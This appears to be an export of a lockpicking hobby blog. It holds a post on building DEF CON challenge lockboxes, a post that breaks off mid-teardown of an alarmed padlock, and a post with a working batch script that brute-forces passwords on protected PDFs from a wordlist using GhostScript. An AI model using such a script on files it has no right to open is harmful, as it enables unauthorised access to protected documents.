tag:blogger.com,1999:blog-77769057994867447202024-03-05T09:56:40.441-10:00Scripts and PicksUnknownnoreply@blogger.comBlogger41125tag:blogger.com,1999:blog-7776905799486744720.post-64634466924925250922017-06-20T20:33:00.000-10:002017-06-20T20:33:55.836-10:00A very brief guide to making a challenge lockboxI had a couple requests to document the build process I use for making lockboxes. This year I made new challenge boxes for dcdarknet at defcon 25.<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFyYBelOxOVOuGQybUHX6EUzxv3XpXXL0uWMxkbXy5fqPx3e3AUUCtf5N3gamG46xyFFW1SFqBbB8PHmcdVTBxI_Gp95Bt4Pd3OfQvMU385ZmIaLJsYa8_EWlew0-UhKVDm34sHKtRJGg/s1600/Tyl9bYv.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="900" data-original-width="1600" height="180" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFyYBelOxOVOuGQybUHX6EUzxv3XpXXL0uWMxkbXy5fqPx3e3AUUCtf5N3gamG46xyFFW1SFqBbB8PHmcdVTBxI_Gp95Bt4Pd3OfQvMU385ZmIaLJsYa8_EWlew0-UhKVDm34sHKtRJGg/s320/Tyl9bYv.jpg" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">The Neapolitan Trio</td></tr>
</tbody></table>
<br />
Here's the previous version:<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFPc8Wgp-OVagHMin8npec46Bs5KwxY9bmzOWF1J0zwVpiCzmacfQ7lpbxzCCF9BKPtsT-saWmKME0WN_uvjgf7_PuykFpsTyprVXckqiwX6o211HaGpK0-_d2lV_iuI0J7qU2oHaHeLk/s1600/0.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="416" data-original-width="594" height="224" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFPc8Wgp-OVagHMin8npec46Bs5KwxY9bmzOWF1J0zwVpiCzmacfQ7lpbxzCCF9BKPtsT-saWmKME0WN_uvjgf7_PuykFpsTyprVXckqiwX6o211HaGpK0-_d2lV_iuI0J7qU2oHaHeLk/s320/0.png" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">"Lockbox 1"</td></tr>
</tbody></table>
<br />
Here's the very first one I ever made:<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhRMBgFOhWG5NRnkaMRgUBxhW4Ad8xXSJ4WaqIHtnTaYARyVN0XYMzmY7sPkU87MCAxor3ll-lPIjgutHq48vh2cBP_VSdwxC-cgPi8vxfVuo-5a35tH___yZLizn3IzqlSvs-OY5JIFdI/s1600/BQX5CBFCEAAW_Mm.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="804" data-original-width="599" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhRMBgFOhWG5NRnkaMRgUBxhW4Ad8xXSJ4WaqIHtnTaYARyVN0XYMzmY7sPkU87MCAxor3ll-lPIjgutHq48vh2cBP_VSdwxC-cgPi8vxfVuo-5a35tH___yZLizn3IzqlSvs-OY5JIFdI/s320/BQX5CBFCEAAW_Mm.jpg" width="238" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">"The Rook"</td></tr>
</tbody></table>
<br />
It's been a long process of create, test, (fail), revise. The original challenge I built, The Rook, was very visually pleasing, but the mounting equipment I cobbled together was not sufficient to handle several hundred people wrenching on it all day for the entirety of defcon 21 (?), several of the locks became loose and all you needed to do was grab the housing and twist to activate the scoring mechanism. There was no way to open it without destroying it to service the locks, or the other internals, all in all it was a good learning experience but completely illogical for long term use.<br />
<br />
The second edition, Lockbox 1, had several good revisions. You could open it to service it, the locks were removable, it could be much more easily transported. Still had the issue of locks spinning after hundreds of people applying tension to the locks though. No matter how hard we tightened the nuts down on the locks they would eventually work loose. The scoring mechanism was very simple, the positive wire was secured to the lock on the cam screw, the negative wire was attached to a screw that the cam would contact when the lock was picked. That idea didn't hold up very well either, the wires came loose often and caused problems, not to mention just failing from repeated wear and tear of flexing multiple times. The display had exposed connections that would get shorted out of anything conductive was ran across them, such as the keys, of someones lockpicks. The battery was accessible, but you had to open the box for maintenance and it was a hassle.<br />
<br />
The newest version is the culmination of all the lessons I've learned on how not to do things.<br />
<br />
So that's a short(ish) history on the lockboxes, here's a brief rundown on some of the techniques and mounting hardware I use. I can't go into too much depth as these are the new versions that will be in use this year, and hopefully about the next 3 years.<br />
<br />
First things first, plan out your entire layout and make sure everything will fit in the area you have available. Do I do that? No, Does it bite me in the ass every single build? Oh yeah, multiple times. The pictures below are from a testing board I used while building this years boxes, so ignore all the extra holes, half and half stain job, etc etc....<br />
<br />
I usually use pin tumbler mortise cylinders and then some wafer locks and padlocks as these are the three most common locks people run into on a regular basis.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfigPvk3XEfp_tOFrIclDtzPc1bTH0AnT3MPQlbEe5Srf8mAIfd5OO39BQbUjxCd3ucBX75-NyaE90VZ9tBpexHv9aPe6duHPz0Gv3iNdj8WcevQtHIK92_hnqBK9gngdl0KWzGKrDCE8/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="978" data-original-width="507" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfigPvk3XEfp_tOFrIclDtzPc1bTH0AnT3MPQlbEe5Srf8mAIfd5OO39BQbUjxCd3ucBX75-NyaE90VZ9tBpexHv9aPe6duHPz0Gv3iNdj8WcevQtHIK92_hnqBK9gngdl0KWzGKrDCE8/s640/1.png" width="328" /></a></div>
<br />
A 1 3/16th inch hole saw is perfect for cutting holes for cylinder locks. The 3/4 inch hole saw works well for most cabinet style wafer and tubular locks. When planning the locations, make one pilot hole directly in the center of where the lock is supposed to go, this ensures you're centered no matter which side of the board you're working on.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEil8K0K51lu-I5YeMe46ngEz3GItCwXy7m00o1MRrUA9kdK2f61WF3K6te1HXiyWRmzfOGZZ6Hi9N3VZtZOI8Vrq6w64Pcjncr7QfrS2RovPJYpjlr24ExDH8zMqneTChLpSrhnsWfKP_k/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="790" data-original-width="451" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEil8K0K51lu-I5YeMe46ngEz3GItCwXy7m00o1MRrUA9kdK2f61WF3K6te1HXiyWRmzfOGZZ6Hi9N3VZtZOI8Vrq6w64Pcjncr7QfrS2RovPJYpjlr24ExDH8zMqneTChLpSrhnsWfKP_k/s320/2.png" width="182" /></a></div>
Next I drill a relief on the back side for all the cylinder locks. Why do I do that, well remember the issues with locks spinning loose? We made a solution for that.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgcewFcA7bJP5zDVnMVGx0qmbhnaIOVNzq8-y-gUKyGh0QCwXrKti7mzQg3V0QKhkeenS3QNRsjYMnGglQCL8AUFdi8sOyufvHOs5Co9uB0trRyX_ScMphxf1SUYtLCbgEsOxgBs4mXK9E/s1600/3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="464" data-original-width="475" height="311" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgcewFcA7bJP5zDVnMVGx0qmbhnaIOVNzq8-y-gUKyGh0QCwXrKti7mzQg3V0QKhkeenS3QNRsjYMnGglQCL8AUFdi8sOyufvHOs5Co9uB0trRyX_ScMphxf1SUYtLCbgEsOxgBs4mXK9E/s320/3.png" width="320" /></a></div>
Say hello to my little friend, the StopSpin (trademark, patent pending, etc). I worked with my friend and fellow dcdarknet contest agent Bunni to develop these lovely little helpers.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKZ7lYhj0BTwWQaGK61wq5TrkPoksPoz-6kvV-410JYVd1VWuSg9E65JZ2upeGqirAR5TZeQFNvg3JwsZDWXqhi37WDk4jOC-Ve2-CVGfrLx9zTTpTS5otsZPShZ68_Cu9CIRxn0R4OI0/s1600/4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="516" data-original-width="520" height="317" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKZ7lYhj0BTwWQaGK61wq5TrkPoksPoz-6kvV-410JYVd1VWuSg9E65JZ2upeGqirAR5TZeQFNvg3JwsZDWXqhi37WDk4jOC-Ve2-CVGfrLx9zTTpTS5otsZPShZ68_Cu9CIRxn0R4OI0/s320/4.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
The tabs on the StopSpin interact with the grooves on the lock to stop them from spinning once it's screwed down onto the board.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhaBvg0RjDdobnpeSKpBDfC6yBrKzg94vdwtZcycC6GPGryIk31_xwuTSFu4w_KYUctEG3gzCOKtC6Py9qFN2jfUZB1GmVsxDRRvoqvaKn9FcvX_fOTrVrEfxzCIw3YNm7rdqz_S-EI9WM/s1600/7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="504" data-original-width="491" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhaBvg0RjDdobnpeSKpBDfC6yBrKzg94vdwtZcycC6GPGryIk31_xwuTSFu4w_KYUctEG3gzCOKtC6Py9qFN2jfUZB1GmVsxDRRvoqvaKn9FcvX_fOTrVrEfxzCIw3YNm7rdqz_S-EI9WM/s320/7.png" width="311" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
This allows us to swap out locks by just removing the nut and popping the lock out. No need to apply the strength of the gods to tighten the nut down, the lock can't spin loose so all it needs to do is stop the lock from falling out of the mounting hole.</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1fAi-5PGbI67wBIWsaTV_IpXrfsTOSXjE2TAIMlI_UU5AtK0pYK0Xj0W3aKo6Enp9GhBRh6APpj-0ZItePA_rlBpzx67kGkVh5jheLIaJhn9M-OeBVMmgOwYrhMR_GqCM949tktwlJao/s1600/9.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="405" data-original-width="433" height="299" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1fAi-5PGbI67wBIWsaTV_IpXrfsTOSXjE2TAIMlI_UU5AtK0pYK0Xj0W3aKo6Enp9GhBRh6APpj-0ZItePA_rlBpzx67kGkVh5jheLIaJhn9M-OeBVMmgOwYrhMR_GqCM949tktwlJao/s320/9.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEizmDfCl8bn9Wh3TgBZvef_jevNKStKzsTh8qPJ75PFu-ueaCpm6o6OAY8nR2axnsq-qZ8uLkcBprdHiPNyrALsheyZea7zD4vPXoECM-HhhLxyN9PFFEk5bAkSu0b7b0ISjkSQS0caL2c/s1600/10.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="312" data-original-width="329" height="303" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEizmDfCl8bn9Wh3TgBZvef_jevNKStKzsTh8qPJ75PFu-ueaCpm6o6OAY8nR2axnsq-qZ8uLkcBprdHiPNyrALsheyZea7zD4vPXoECM-HhhLxyN9PFFEk5bAkSu0b7b0ISjkSQS0caL2c/s320/10.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
It's the most efficient mounting method I've found. I've seen, and tried myself, most of the mounting methods documented on lockpicking101 and various other sites. Nothing else I've tried is as easy to mount and swap out locks on a board.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj66vwJCYMqQEdjvW3I4zXebBrvF8_THYmpk4Z_m6XlZ7HskDbtXK2HB7Yj-POUycXwmUgZF8d8qX_9FnhUS6LhaGUPGIeDQVGueLk7M96F-qNu12RPhCwy6lZbh3FL5-R8lSAtR80bbys/s1600/11.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="416" data-original-width="471" height="282" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj66vwJCYMqQEdjvW3I4zXebBrvF8_THYmpk4Z_m6XlZ7HskDbtXK2HB7Yj-POUycXwmUgZF8d8qX_9FnhUS6LhaGUPGIeDQVGueLk7M96F-qNu12RPhCwy6lZbh3FL5-R8lSAtR80bbys/s320/11.png" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYuHMDQi50hX_O0KQoJ3_-IkVdQ8GF2bc0FwzNJRYjbsq2qfhtOMjNB-khd1NF7JFHZOqbM6GGtzv78g0kBzfld0wnkJugqJR5HT_Ifz6l85gPE7HmEiXG1nsszCzr-LstdzQNLOTTzls/s1600/12.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="433" data-original-width="376" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYuHMDQi50hX_O0KQoJ3_-IkVdQ8GF2bc0FwzNJRYjbsq2qfhtOMjNB-khd1NF7JFHZOqbM6GGtzv78g0kBzfld0wnkJugqJR5HT_Ifz6l85gPE7HmEiXG1nsszCzr-LstdzQNLOTTzls/s320/12.png" width="277" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
The other locks I just use the included anti-spin holders that interact with the flat sides of the lock body.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEidOaWL5LBA3BRfLf80gh7iA-Hfya10ZGttGWlLdE9Y8dD0a8syhrxApNmKqn2p9akM4VAqvYKTRGTrThp1M5OLED8oynBG_eamz9BQaEXZ3UM9mvhMyYvfGMn-Ovn-ImzSiJFjWGFV_rs/s1600/14.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="374" data-original-width="520" height="230" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEidOaWL5LBA3BRfLf80gh7iA-Hfya10ZGttGWlLdE9Y8dD0a8syhrxApNmKqn2p9akM4VAqvYKTRGTrThp1M5OLED8oynBG_eamz9BQaEXZ3UM9mvhMyYvfGMn-Ovn-ImzSiJFjWGFV_rs/s320/14.png" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjah74LFIIp5V3vu-oBh4WXaliWyPyobrGC6H6BFri8aWSTajjZrVzO5RfstnQPpuS50liKZHkGmFh0aMI-9Bp8wDMNy_dRJU7iUjRIEzDbzogUEJFlgaj_yM0HbJ0z-yPP_S4ugYqcJqo/s1600/15.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="527" data-original-width="461" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjah74LFIIp5V3vu-oBh4WXaliWyPyobrGC6H6BFri8aWSTajjZrVzO5RfstnQPpuS50liKZHkGmFh0aMI-9Bp8wDMNy_dRJU7iUjRIEzDbzogUEJFlgaj_yM0HbJ0z-yPP_S4ugYqcJqo/s320/15.png" width="279" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
Make sure to align your movement restriction washers properly so the locks turn the correct way. This also creates an added difficulty because the people trying to pick them don't know which way to tension the lock.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiUCDg54ce5ViWIF1GI37Oh3QIKM26G2qRtiqjoidJx7IBfOx3Z-q3CF22A_GMV3dGRHBda2skNP6jRx-RWa5vhjxBGijRK24SiIC-B9XRas7zLHNMdZuUKUPOZf2fCY9YY1k2LqQXcV6Q/s1600/16.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="736" data-original-width="596" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiUCDg54ce5ViWIF1GI37Oh3QIKM26G2qRtiqjoidJx7IBfOx3Z-q3CF22A_GMV3dGRHBda2skNP6jRx-RWa5vhjxBGijRK24SiIC-B9XRas7zLHNMdZuUKUPOZf2fCY9YY1k2LqQXcV6Q/s320/16.png" width="259" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg41G4lO2hiZ_AsSdmxlR_qk_EWfPlv5EiWGzWgv7ygNSDoTePpgPJ-mIES6Q0Fc1JSDXjBuNq-vfUu9qNfIKxQrkgAAnifzY8e2uClXcd4YXbmqV1A4tdGcANk9gKD-IcyAjVC8w-ogZ0/s1600/17.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="668" data-original-width="583" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg41G4lO2hiZ_AsSdmxlR_qk_EWfPlv5EiWGzWgv7ygNSDoTePpgPJ-mIES6Q0Fc1JSDXjBuNq-vfUu9qNfIKxQrkgAAnifzY8e2uClXcd4YXbmqV1A4tdGcANk9gKD-IcyAjVC8w-ogZ0/s320/17.png" width="279" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
This gives you a nice flush mounting on the face of your board, stops the locks from spinning, and makes swapping out locks quick and easy,</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfeJTxgVu1lg2Jwd6vRsJVpzXV1LgLGL8Vlz3frT1B_yuTZbWp3uBJlMN8i8nEbMVCQD5lYvZgF7UBsHcWylDeLSYRwEzUK_s_1J0SFCjZDwyWoQWPImRUF484ZK2OpstgJC1yy5KVY8U/s1600/19.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="503" data-original-width="404" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfeJTxgVu1lg2Jwd6vRsJVpzXV1LgLGL8Vlz3frT1B_yuTZbWp3uBJlMN8i8nEbMVCQD5lYvZgF7UBsHcWylDeLSYRwEzUK_s_1J0SFCjZDwyWoQWPImRUF484ZK2OpstgJC1yy5KVY8U/s320/19.png" width="257" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjKRFosNiz-BlrCGAIc17TdRbvqzxr_a6QfTzKxFiXe2p0Tl2Zf-J7xGh9idqxtfBSNq2smjgC18IRpPgx1GGfEb5KKkHnyIs284avCzjXM5S6x2OOGcqROsaXy02PfbEgkmVh7cnMPhk/s1600/18.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="506" data-original-width="958" height="169" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjKRFosNiz-BlrCGAIc17TdRbvqzxr_a6QfTzKxFiXe2p0Tl2Zf-J7xGh9idqxtfBSNq2smjgC18IRpPgx1GGfEb5KKkHnyIs284avCzjXM5S6x2OOGcqROsaXy02PfbEgkmVh7cnMPhk/s320/18.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
I routered the bottom edge of the boards so that they sit low enough in the ammo boxes so that the lid doesn't come into contact with them when closed. The ammo boxes are just regular bunker hill boxes from harbor freight, you can pick them up for ~$4 if you get them on sale with a coupon, which they pretty much always are.</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7ARBoxQZWTNAgf9e-aBfTP5k_Zia6kNyMHAbxkjaKhDjnNVUfh3z3m3DmRPeWsbBQzjgq3_menm6QfqwxfsFSNaETiHjjee2GmKDaxjKeNKvXrErJIQRkyjtRabXIumfaGL1fCzPWi90/s1600/20.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="670" data-original-width="707" height="303" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7ARBoxQZWTNAgf9e-aBfTP5k_Zia6kNyMHAbxkjaKhDjnNVUfh3z3m3DmRPeWsbBQzjgq3_menm6QfqwxfsFSNaETiHjjee2GmKDaxjKeNKvXrErJIQRkyjtRabXIumfaGL1fCzPWi90/s320/20.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
The rest of the build is all confidential info, but this should give you enough information to plan and make you own practice stands/holders/challenge boxes.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
All the software and circuit boards are handled by Bunni, he's the real brains behind these as far as making them do what they do. I'm just a monkey with a wood shop.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
So if you happen to be at Defcon this year come on down and join the dcdarknet contest (shameless plug) and give these lockboxes a spin, let me know what you like about them, how you think they could be better, what kind of different locks you'd like to see, etc, I keep a bucket nearby to catch the tears of those who are defeated by the locks.</div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-7776905799486744720.post-33277214293547579812016-07-11T07:25:00.000-10:002016-07-11T07:25:12.458-10:00Simple PDF Brute Force Tool using GhostScript 9.09I've had to deal with a lot of PDF's that come in either Secured (cannot copy, cannot print) or Password Protected (requires password to open) lately.<br />
<br />
Using GhostScript you can make a simple brute force tool to attack these password protected PDF's.<br />
<br />
I'm well aware there are commercial options for doing this, but I don't like to pay money for something I can figure out myself. My method is not as fast or feature rich, but it can get the job done.<br />
<br />
You'll need to install GhostScript, I used revision 9.09, if you're using a newer or older version adjust the script below accordingly for the executable paths.<br />
<br />
You'll also need a dictionary file (%userprofile%\desktop\passwords.txt) <- adjust accordingly.<br />
<br />
With the way this script is written, you can simply drag and drop the PDF file onto the batch file icon, or pass it as a variable ex: bruteforece.bat Path.to.PDF.pdf<br />
<br />
@echo off<br />
setlocal enabledelayedexpansion<br />
Title Performing Magic, please wait...<br />
for /f "tokens=* delims=" %%a in (%userprofile%\desktop\passwords.txt) do (<br />
echo Trying password: %%a<br />
"C:\Program Files (x86)\gs\gs9.09\bin\gswin32c.exe" -q -sPDFPassword=%%a %1<br />
if !errorlevel! == 0 echo Password is %%a & pause > nul<br />
cls<br />
)<br />
echo password not found<br />
pause<br />
exitUnknownnoreply@blogger.com0tag:blogger.com,1999:blog-7776905799486744720.post-65313293179102743712015-12-17T08:19:00.000-10:002015-12-17T08:29:08.015-10:00Z-Con Lock TeardownI got this lock a while ago for two reasons; it's an alarmed padlock, it has a funky key.<br />
Since then it's been hanging out in a display case.<br />
<br />
Here's the tear down.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSZzPvpbZ6ZRzJt9FWQ-cAY7Q3Kqg8MLjsiGMvYQD7bZjwgKKmuMWJz7OWrg2pTWnj51ydRmylXjSX4yf-bhHc2JRYK4Q3rXWJEl3Hd-pk1BEu70-cHAV09wJuppd-x6fZe5RR4fVRNEY/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSZzPvpbZ6ZRzJt9FWQ-cAY7Q3Kqg8MLjsiGMvYQD7bZjwgKKmuMWJz7OWrg2pTWnj51ydRmylXjSX4yf-bhHc2JRYK4Q3rXWJEl3Hd-pk1BEu70-cHAV09wJuppd-x6fZe5RR4fVRNEY/s320/1.png" width="180" /></a></div>
This is the lock I got with a Z-Con Lock core. I believe that Z-Con makes the cores then sells them to manufacturers to use in their own locks. It's a reasonably well designed lock, no exploitable design flaws in the body of the lock that would allow me to unlock it that I could find, disabling the audio alarm is a different story. Dual ball bearing locking mechanism so shimming is out of the question, solid metal exterior, hardened shackle.<br />
<br />
Here's the bottom of the lock:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjCyvGRhOg5AsrshA9Xz4p84agiRx0VaC-SqGi7wOXy1zF53i6BZ8OxMfjpRT0CncWBAPtueSDpe-V2KBJ3Uh1LnlsC7XJZ_2awgytM7THVrjT8JTAHPoGPz0XVwnYtX_xJg-mDSlus6EQ/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="229" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjCyvGRhOg5AsrshA9Xz4p84agiRx0VaC-SqGi7wOXy1zF53i6BZ8OxMfjpRT0CncWBAPtueSDpe-V2KBJ3Uh1LnlsC7XJZ_2awgytM7THVrjT8JTAHPoGPz0XVwnYtX_xJg-mDSlus6EQ/s320/2.png" width="320" /></a></div>
With just a small philips screwdriver you can undo the bottom plate and access the internals. However actually getting that bottom plate off is rather tricky since it's a very very tight fit.<br />
<br />
Internals exposed<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjX579wMbyCcQ46p7c_jPWlOhCBig6Sov_4126a3Tky0BcdWVMwTALZOZjZAuFUW4C7JITaidaEhj4UZQxMWJv1KuwktTzHS2ue8d_b0LHx3zJZMaqfJGdQrp-3dVhuO6b73TTiALngL24/s1600/3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="182" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjX579wMbyCcQ46p7c_jPWlOhCBig6Sov_4126a3Tky0BcdWVMwTALZOZjZAuFUW4C7JITaidaEhj4UZQxMWJv1KuwktTzHS2ue8d_b0LHx3zJZMaqfJGdQrp-3dVhuO6b73TTiALngL24/s320/3.png" width="320" /></a></div>
On the top here you can see the edge of the circuit board, the wiring, and the battery compartment cover (white plastic).<br />
<br />
Here's the circuitry:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhp_0HgknM8yKVjA6mzWe-HY9wjfBo3wDvBKqgqcPxHUyvrKOZFEc6blrPwIHSOw47E3vqnPuaAJmyryOkRtKi9yXNw0WrJUubkYcscYp9EzZQ1bH8sbvQZULVAo9hwKrzifYH2hBRUKBQ/s1600/4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="238" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhp_0HgknM8yKVjA6mzWe-HY9wjfBo3wDvBKqgqcPxHUyvrKOZFEc6blrPwIHSOw47E3vqnPuaAJmyryOkRtKi9yXNw0WrJUubkYcscYp9EzZQ1bH8sbvQZULVAo9hwKrzifYH2hBRUKBQ/s320/4.png" width="320" /></a></div>
<br />
Large black circle in the upper left is the speaker. Yellow is a piece of rubber meant to waterproof.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj6Vr1i82EfcoKN8ztN1piaapFvX73yCRkhyF9kGGnfc4KuOwaVk7HlX04Gk-0UCRa6Ra9A4FJqnO2TO5-As5rkTHbbzYrQ03eQWlYPu0QbHLyhMyLJY5ELIaBHxeyHPJ9iQE2CWFXooc8/s1600/5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="227" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj6Vr1i82EfcoKN8ztN1piaapFvX73yCRkhyF9kGGnfc4KuOwaVk7HlX04Gk-0UCRa6Ra9A4FJqnO2TO5-As5rkTHbbzYrQ03eQWlYPu0QbHLyhMyLJY5ELIaBHxeyHPJ9iQE2CWFXooc8/s320/5.png" width="320" /></a></div>
<br />
Above: A closeup of the circuit board "front" <br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
